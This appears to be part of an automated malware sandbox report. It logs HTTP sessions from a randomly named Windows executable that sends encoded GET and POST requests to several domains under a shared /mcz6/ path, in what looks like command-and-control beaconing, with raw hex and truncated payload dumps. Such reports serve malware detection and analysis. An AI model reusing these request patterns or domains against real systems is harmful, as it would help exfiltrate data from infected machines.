4f 77 31 76 65 2f 57 63 76 47 68 6f 57 43 38 5a 73 5a 39 44 52 30 62 42 44 79 78 69 2f 54 70 42 68 6c 77 58 66 53 55 35 66 75 32 72 55 57 4c 52 43 39 6a 34 51 39 79 30 4e 68 62 72 4d 33 74 49 53 78 59 42 69 65 74 6d 35 57 2f 49 7a 78 55 57 58 6c [TRUNCATED] Data Ascii: l65lvjLx=g0NNOeEZLnaHL4c8W2GQ9wpuIF5ulH9ZiZNp4mbkP13ZRJxhbWSaE2bRt6/IX9IrGwMZCq8G80orn1Xea4bIfW04Df9ofymqb7eeinX8VZfENYerK212nhd07QIOPOc7cu2JlyztrTxrqIYEqaIDngR/x71POCWuruzf3R6uuqPHdL4reTJPxdER7d6bdwAP8FPDsgUnpeyYw0ZNrK4RiV8cxe+XP7k+hUpt/B0e/biUd+5PdCXIfV7Ow1ve/WcvGhoWC8ZsZ9DR0bBDyxi/TpBhlwXfSU5fu2rUWLRC9j4Q9y0NhbrM3tISxYBietm5W/IzxUWXl+tGKAy/RcUv7aTPpnvW3vvh5PJu1xEDab34FXf8IP18UaoRYqPDCuzmV6242wZQhnI7sVt3sC+MxcBIesSquydcQ9setJVNRYkKdC7vDi6iEgTK0sMycGRODzml496g24GVng8EL7C4eUGbfQpprORlQVF6e6xPdKFlcjY6nLoMkF56aFvkkMsOCyCpdL1d9zTNR71Ss3WC6A1JCUGgzZsIfjEC+XbhGWIPPy5sm/b7GyDJlnKclearClb7vU0qSpc6dJYlLUHdIm/bv19RMQEl5KPKaHi1TdON3yld67P+t7geRpr2fQyQw3In9pJR5ah5NVcxRo1ITUBtXHGqQzFiq1dlBf0U8SCnv6B8EBQFYi797o7EXDwe8OQ72e8Fo7X2ALQFiQkgPBF+9cRomEr7c3j4u12jxVyH8P1ndvu8hD0csIn8DliWDW8jStDgT63bSu9vQQA0AhAzK+UYeYsWmN3uACQSeUIqWgSQxouFQFwZb6IKNg76V72HUt0o9QGbXBM9jEvlMfIuE7IR2UxUAoDDplkTRidj4NVFMqOciTby2UeJsCmQ49Ew4/lJ20drBmyK1Uy8qT9O1p5KWMlj1NyReDn67SOyHN7eEUiPE3tJfitjPvq09l7ZaGz9xFRJCcb9/uO9E2x5w+Twjoy7fSKyFjwt6yP [TRUNCATED]
Jun 6, 2024 13:26:28.117235899 CEST	1236	IN	HTTP/1.1 200 OK Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Thu, 06 Jun 2024 11:26:27 GMT Server: Apache Content-Encoding: gzip Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED] Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m\|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H\|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1\|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
Jun 6, 2024 13:26:28.117300987 CEST	899	IN	Data Raw: 48 7c e8 87 12 4a b6 70 ed 03 80 8f 42 9b 62 45 0a 45 94 d6 13 9e fe b6 8e 26 e4 0c 4a c3 cf d9 30 61 f4 af 39 65 37 1f cc fe c4 1d 03 00 8f 77 0c 44 61 cf a4 c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5 Data Ascii: H\|JpBbEE&J0a9e7wDa%oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7JQd+EI?2.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49760	217.160.0.111	80	4600	C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe

Timestamp	Bytes transferred	Direction	Data
Jun 6, 2024 13:26:29.812462091 CEST	482	OUT	GET /mcz6/?l65lvjLx=t2ltNu02BWCxFJkMInGc7SUNVmZAlmpo25Fvtgz0OT6/eZJtaFugFEP80bfDefIKNSUaDat+4U4ei33vOp33J3w7E/1DXRKVU7+ltx/Ze5a9KKXUCEtCgjk=&Znv8F=zltpR6V05ztTbh HTTP/1.1 Host: www.carliente.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Jun 6, 2024 13:26:30.643635035 CEST	1236	IN	HTTP/1.1 200 OK Content-Type: text/html Content-Length: 4545 Connection: close Date: Thu, 06 Jun 2024 11:26:30 GMT Server: Apache Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 54 52 41 54 4f 20 2d 20 44 6f 6d 61 69 6e 20 72 65 73 65 72 76 65 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 4f 70 65 6e 20 53 61 6e 73 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 22 3e 0d 0a 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 33 66 33 66 33 3b 20 70 61 64 64 69 6e 67 3a 20 34 30 70 78 20 30 3b 20 77 69 64 74 68 3a 20 31 30 30 25 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 31 35 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d [TRUNCATED] Data Ascii: <!DOCTYPE html><html> <head> <title>STRATO - Domain reserved</title> </head> <body style="background-color: #fff; font-family: Open Sans, sans-serif; padding: 0; margin: 0;"> <div style="background-color: #f3f3f3; padding: 40px 0; width: 100%;"> <div style="width: 150px; margin-left: auto; margin-right: auto;"><a href="https://www.strato.de" rel="nofollow" style="border: 0;"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 157.4 33.7"><defs><style>.a{fill:#f80;}.b{fill:#f80;}</style></defs><title>STRATO</title><path class="a" d="M17.8,7a4.69,4.69,0,0,1-4.7-4.7H29.6A4.69,4.69,0,0,1,34.3,7V23.5a4.69,4.69,0,0,1-4.7-4.7V9.4A2.37,2.37,0,0,0,27.2,7Z" transform="translate(-1.3 -2.3)"/><path class="b" d="M57.7,32.9c-1.3,2.5-4.7,2.6-7.3,2.6-2.1,0-4-.1-5.2-.2-1.5-.1-1.8-.5-1.8-1.3V32.9c0-1.3.2-1.7,1.4-1.7,2.1,0,3.1.2,6.2.2,2.4,0,2.9-.2,2.9-2.3,0-2.4,0-2.5-1.3-3.1a42.2,42.2,0,0,0-4.5-1.8c-3.7-1.6-4.4-2.3-4.4-6.5,0-2.6.5-4.8,3.4-5.7a14,14,0,0,1,4.9-.6c1.6, [TRUNCATED]
Jun 6, 2024 13:26:30.643701077 CEST	1236	IN	Data Raw: 33 2c 30 2c 31 2e 36 2c 31 2e 33 2c 32 2e 31 2e 39 2e 35 2c 32 2c 2e 38 2c 32 2e 39 2c 31 2e 33 2c 34 2e 39 2c 32 2e 31 2c 36 2c 32 2e 35 2c 36 2c 36 2e 37 61 31 30 2e 31 32 2c 31 30 2e 31 32 2c 30 2c 30 2c 31 2d 2e 36 2c 34 2e 38 4d 37 37 2e 31 Data Ascii: 3,0,1.6,1.3,2.1.9.5,2,.8,2.9,1.3,4.9,2.1,6,2.5,6,6.7a10.12,10.12,0,0,1-.6,4.8M77.1,15.7c-2.1,0-3.7,0-5.2-.1v18a1.4,1.4,0,0,1-1.5,1.6H69c-1.1,0-1.7-.3-1.7-1.6V15.7c-1.5,0-3.2.1-5.3.1-1.5,0-1.5-.9-1.5-1.6v-.9A1.36,1.36,0,0,1,62,11.8H77.2c.8,0,1.
Jun 6, 2024 13:26:30.643739939 CEST	1236	IN	Data Raw: 35 73 2d 2e 36 2c 37 2e 31 2d 32 2e 36 2c 39 2e 35 4d 31 35 33 2c 31 37 2e 34 63 2d 2e 38 2d 31 2e 36 2d 32 2e 34 2d 32 2e 33 2d 34 2e 34 2d 32 2e 33 73 2d 33 2e 36 2e 36 2d 34 2e 34 2c 32 2e 33 63 2d 2e 37 2c 31 2e 35 2d 2e 38 2c 34 2e 34 2d 2e Data Ascii: 5s-.6,7.1-2.6,9.5M153,17.4c-.8-1.6-2.4-2.3-4.4-2.3s-3.6.6-4.4,2.3c-.7,1.5-.8,4.4-.8,6.1s.1,4.6.8,6.1,2.4,2.3,4.4,2.3,3.6-.7,4.4-2.3.8-4.2.8-6.1-.1-4.6-.8-6.1" transform="translate(-1.3 -2.3)"/><path class="a" d="M24.9,14a2.26,2.26,0,0,0-2.3-2.
Jun 6, 2024 13:26:30.643779993 CEST	975	IN	Data Raw: 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 22 20 6c 61 6e 67 3d 22 6e 6c 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 20 66 6f 6e 74 2d 77 65 Data Ascii: padding-bottom: 30px" lang="nl"><span style="font-size: 14px; color: #777; font-weight: bold;">Nederlands</span><br>Deze website werd zojuist geregistreerd. Een webinhoud werd nog niet toegevoegd.</div> <div style="padding-bottom: 30px"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49761	91.195.240.123	80	4600	C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe

Timestamp	Bytes transferred	Direction	Data
Jun 6, 2024 13:26:36.375957012 CEST	753	OUT	POST /mcz6/ HTTP/1.1 Host: www.walletweb367.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.walletweb367.top Referer: http://www.walletweb367.top/mcz6/ Connection: close Content-Length: 205 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 6c 36 35 6c 76 6a 4c 78 3d 7a 4a 6f 79 5a 69 55 4d 4f 48 70 42 37 71 35 66 72 37 67 37 4c 47 6a 48 41 78 62 6e 46 73 63 5a 33 54 44 75 46 32 30 71 45 41 59 67 55 54 57 49 53 6f 5a 75 58 43 30 77 57 4d 59 6c 70 63 50 50 45 7a 4a 77 73 35 37 77 59 54 45 74 71 64 67 67 35 71 30 67 39 4e 72 52 58 42 39 6b 42 77 51 79 4c 67 43 55 34 36 4c 44 4b 75 4a 2f 43 46 36 33 51 32 2f 65 78 4a 39 50 33 37 34 58 57 72 61 49 36 49 6a 6f 34 46 61 57 32 5a 49 38 50 4c 57 71 39 6b 71 7a 65 43 6b 4a 5a 6b 79 73 37 45 65 32 77 6e 53 52 56 45 4a 67 68 32 45 51 47 42 38 2b 67 47 69 65 42 7a 6a 37 75 71 7a 79 5a 77 43 43 36 77 3d 3d Data Ascii: l65lvjLx=zJoyZiUMOHpB7q5fr7g7LGjHAxbnFscZ3TDuF20qEAYgUTWISoZuXC0wWMYlpcPPEzJws57wYTEtqdgg5q0g9NrRXB9kBwQyLgCU46LDKuJ/CF63Q2/exJ9P374XWraI6Ijo4FaW2ZI8PLWq9kqzeCkJZkys7Ee2wnSRVEJgh2EQGB8+gGieBzj7uqzyZwCC6w==
Jun 6, 2024 13:26:37.217580080 CEST	305	IN	HTTP/1.1 405 Not Allowed date: Thu, 06 Jun 2024 11:26:37 GMT content-type: text/html content-length: 154 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49762	91.195.240.123	80	4600	C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe

Timestamp	Bytes transferred	Direction	Data
Jun 6, 2024 13:26:38.908277988 CEST	773	OUT	POST /mcz6/ HTTP/1.1 Host: www.walletweb367.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.walletweb367.top Referer: http://www.walletweb367.top/mcz6/ Connection: close Content-Length: 225 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 6c 36 35 6c 76 6a 4c 78 3d 7a 4a 6f 79 5a 69 55 4d 4f 48 70 42 70 61 4a 66 6f 59 59 37 61 6d 6a 59 4b 52 62 6e 4d 4d 64 53 33 54 48 75 46 33 41 36 44 79 4d 67 56 79 6d 49 41 70 5a 75 55 43 30 77 5a 73 59 67 6b 38 50 79 45 7a 45 44 73 37 2f 77 59 58 73 74 71 5a 6b 67 35 62 30 68 39 64 72 58 43 78 39 6d 4d 51 51 79 4c 67 43 55 34 36 65 6d 4b 75 52 2f 43 52 47 33 42 6b 48 5a 74 35 39 4f 2b 62 34 58 41 62 61 4d 36 49 6a 47 34 45 47 38 32 64 34 38 50 4b 6d 71 38 32 43 77 4a 79 6b 50 48 6b 7a 53 79 46 50 4a 71 55 57 5a 4c 6e 74 56 72 6e 41 6b 4f 6e 74 6b 78 33 44 4a 54 7a 48 49 7a 74 36 47 55 7a 2f 4c 68 34 34 6d 5a 65 48 6e 2b 34 6c 38 4c 64 5a 6a 52 4c 73 4f 4a 70 30 3d Data Ascii: l65lvjLx=zJoyZiUMOHpBpaJfoYY7amjYKRbnMMdS3THuF3A6DyMgVymIApZuUC0wZsYgk8PyEzEDs7/wYXstqZkg5b0h9drXCx9mMQQyLgCU46emKuR/CRG3BkHZt59O+b4XAbaM6IjG4EG82d48PKmq82CwJykPHkzSyFPJqUWZLntVrnAkOntkx3DJTzHIzt6GUz/Lh44mZeHn+4l8LdZjRLsOJp0=
Jun 6, 2024 13:26:39.745384932 CEST	305	IN	HTTP/1.1 405 Not Allowed date: Thu, 06 Jun 2024 11:26:39 GMT content-type: text/html content-length: 154 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49763	91.195.240.123	80	4600	C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe

Timestamp	Bytes transferred	Direction	Data
Jun 6, 2024 13:26:41.451986074 CEST	10855	OUT	POST /mcz6/ HTTP/1.1 Host: www.walletweb367.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.walletweb367.top Referer: http://www.walletweb367.top/mcz6/ Connection: close Content-Length: 10305 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 6c 36 35 6c 76 6a 4c 78 3d 7a 4a 6f 79 5a 69 55 4d 4f 48 70 42 70 61 4a 66 6f 59 59 37 61 6d 6a 59 4b 52 62 6e 4d 4d 64 53 33 54 48 75 46 33 41 36 44 7a 30 67 55 45 53 49 53 4b 42 75 56 43 30 77 55 4d 59 68 6b 38 50 56 45 7a 73 50 73 37 6a 67 59 52 6f 74 37 4b 73 67 2f 70 51 68 33 64 72 58 41 78 39 6e 42 77 52 71 4c 67 53 51 34 36 4f 6d 4b 75 52 2f 43 58 69 33 52 47 2f 5a 76 35 39 50 33 37 34 62 57 72 61 77 36 4d 48 77 34 48 71 47 33 75 77 38 42 4b 32 71 2f 44 65 77 56 69 6b 4e 54 45 7a 61 79 46 44 6f 71 58 7a 69 4c 6d 49 4f 72 6e 30 6b 4b 41 59 4f 69 58 50 67 4d 78 4c 67 70 38 4f 6b 53 55 75 4c 69 4b 67 46 4b 4f 6e 62 69 72 4e 75 48 71 49 2f 49 4b 41 2f 59 63 6c 65 41 68 77 71 64 6a 48 6d 72 64 42 76 4b 68 2f 32 4a 79 69 6a 56 72 37 56 6d 4d 41 63 6e 6d 74 35 59 43 41 54 78 64 6c 32 62 47 4c 78 59 77 6d 56 69 6f 71 55 63 70 67 43 79 5a 41 72 4e 4d 66 4a 57 52 36 52 31 67 4e 6b 59 46 34 78 58 4e 70 78 54 46 65 4e 54 50 39 73 75 4c 4a 53 4a 59 31 68 42 35 30 50 36 6c 61 78 54 30 4c 55 34 37 73 51 34 [TRUNCATED] Data Ascii: l65lvjLx=zJoyZiUMOHpBpaJfoYY7amjYKRbnMMdS3THuF3A6Dz0gUESISKBuVC0wUMYhk8PVEzsPs7jgYRot7Ksg/pQh3drXAx9nBwRqLgSQ46OmKuR/CXi3RG/Zv59P374bWraw6MHw4HqG3uw8BK2q/DewVikNTEzayFDoqXziLmIOrn0kKAYOiXPgMxLgp8OkSUuLiKgFKOnbirNuHqI/IKA/YcleAhwqdjHmrdBvKh/2JyijVr7VmMAcnmt5YCATxdl2bGLxYwmVioqUcpgCyZArNMfJWR6R1gNkYF4xXNpxTFeNTP9suLJSJY1hB50P6laxT0LU47sQ46REWoSC4+KN9NgVwS/ffZKv6u5JXzDsBMqOdP2prZAYZOnh9Kpu4ZNkk5oOUwCjXiYSmVO2kC92UPowKR8XHglm0h2Q9FnYnIsYB+NpE0cHsQFQ7esysas6QVT6rfqKLqOZrK3iuXmpBxJePVCGIMw3eGrxy/Su2sRUA21UK0rWPqw+tfAkqrVMwGHBJDF/HUno1dx/CTf68p+CaKsEHsF86zcGE7WYa3gvvh6jI/kcrmShf8YhVMoJ9X3GdB3v8B8O/jGhfb+ShHTc7bFVtYeYODn7u9ovag+/G4opfJisscVphlhXGSyFfcO5+UWgGMEawzdH56PG/MhOTYFiaD+KK2mZICq4idXAwKwsjPHqzspBULxjHCJRQ4LW0JXylY4XkaASRI2bNinxuDK6uzgiSlCsJF9ZxpEoSxIqRbjc+hAxPI6rfu8M5yvv3FZSYIi4M4T3G9P8+W2DRzXDF2ANMZuqhtu7Z/Q7LhbzBUUajRqKPyIfRKVL0uvpxKW1bnjN7mxQtG173HRFmsiBJu+On/1BxX0CXckQ6c5nISSVxsd9rzP2x9P7KTCkWMq8e7lAeYWdjc6PEo/IVsXy6rqPwagbbrlr9FrnnQgqCqbbcCgqCgRwejyieJ9nC5d4GPI6z58uKns2PdinUx2+o3SdDL5lUOVvHGG [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49764	91.195.240.123	80	4600	C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe

Timestamp	Bytes transferred	Direction	Data
Jun 6, 2024 13:26:44.036181927 CEST	485	OUT	GET /mcz6/?l65lvjLx=+LASaW8sLlti/Y5p1q0qKU3hQBfGLeZfunbDEh0FE1w8Tz+VHrtWZSUefKogmen1MiEzwZmsfiIE4qB4y6VqrKvXOipPExFwKQmiwKnwFMVTTGbdQXrJvJk=&Znv8F=zltpR6V05ztTbh HTTP/1.1 Host: www.walletweb367.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Jun 6, 2024 13:26:44.839747906 CEST	113	IN	HTTP/1.1 439 date: Thu, 06 Jun 2024 11:26:44 GMT content-length: 0 server: Parking/1.0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49765	162.0.237.22	80	4600	C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe

Timestamp	Bytes transferred	Direction	Data
Jun 6, 2024 13:26:50.033319950 CEST	744	OUT	POST /mcz6/ HTTP/1.1 Host: www.deaybrid.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.deaybrid.info Referer: http://www.deaybrid.info/mcz6/ Connection: close Content-Length: 205 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 6c 36 35 6c 76 6a 4c 78 3d 55 35 31 5a 73 35 6a 2f 6e 66 65 61 35 42 36 45 77 7a 70 41 74 63 4d 79 61 2f 43 39 4c 4b 2f 44 71 42 50 30 64 69 4a 37 33 71 46 65 4e 70 51 49 53 31 65 7a 55 76 4c 69 42 67 51 6b 30 70 61 77 6b 71 34 4c 53 74 39 6f 43 6a 49 30 72 64 4b 50 52 42 46 53 69 4e 4a 59 69 5a 6e 4d 2b 39 48 76 56 2f 62 5a 62 66 6b 65 47 56 43 44 61 64 53 6d 52 4e 2b 75 32 62 52 53 57 56 46 61 4b 4c 6f 79 2f 53 67 59 79 70 4a 42 6e 68 4b 45 38 56 34 4a 73 6c 38 35 4c 4d 48 59 68 76 53 61 65 6d 63 69 78 63 32 59 47 50 56 55 4d 53 50 53 5a 71 5a 79 47 79 46 41 64 6d 66 77 43 45 37 70 64 53 33 30 53 41 3d 3d Data Ascii: l65lvjLx=U51Zs5j/nfea5B6EwzpAtcMya/C9LK/DqBP0diJ73qFeNpQIS1ezUvLiBgQk0pawkq4LSt9oCjI0rdKPRBFSiNJYiZnM+9HvV/bZbfkeGVCDadSmRN+u2bRSWVFaKLoy/SgYypJBnhKE8V4Jsl85LMHYhvSaemcixc2YGPVUMSPSZqZyGyFAdmfwCE7pdS30SA==
Jun 6, 2024 13:26:50.696981907 CEST	533	IN	HTTP/1.1 404 Not Found Date: Thu, 06 Jun 2024 11:26:50 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49766	162.0.237.22	80	4600	C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe

